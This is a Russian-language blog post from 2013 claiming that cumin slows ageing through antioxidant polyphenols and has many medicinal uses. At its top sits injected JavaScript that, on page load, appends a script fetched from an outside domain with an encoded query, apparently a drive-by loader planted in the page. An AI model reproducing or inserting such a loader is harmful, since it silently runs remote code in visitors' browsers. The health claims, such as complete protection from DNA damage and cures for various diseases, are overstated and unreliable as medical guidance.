(function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://ccz.say-that.info' + '/?82845=6aDp77v_8fL-9vT57qCspKSurw'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window);

среда, 27 февраля 2013 г.

Зира,специя, замедляющая старение


Любители плова с зирой могут рассчитывать на долгую жизнь. Употребление пряностей издавна связывалось с долголетием и здоровьем.

Специям приписывалось свойство тонизировать организм, делать его более стойким и выносливым. Специалистами индийского Центрального технологического института пищевых исследований была протестирована способность такой пряности, как зира, влиять на продолжительность жизни. И выяснилось, что она обладает очень мощными антиоксидантными свойствами.

Биологические тесты показали, что содержащиеся в зире фенольные вещества, особенно полифенолы, ведут себя в организме как антиоксиданты, то есть уменьшают окислительный стресс внутренних органов и удаляют свободные радикалы. Свободные радикалы оказывают негативное влияние на все системы организма, в том числе на кожу. В экспериментальных условиях зира подавляла окисление липосом и обеспечивала полную защиту от повреждений ДНК.

В традиционной медицине зиру используют для лечения множества заболеваний — от витилиго до гипергликемии. Известна зира и своими противопаразитарным и противомикробным свойствами; её также можно применять как жаропонижающее и болеутоляющее. Аромат зиры успокаивает при нервных потрясениях и стрессах, чувстве страха, нервозности и раздражительности.

Комментариев нет:

Отправить комментарий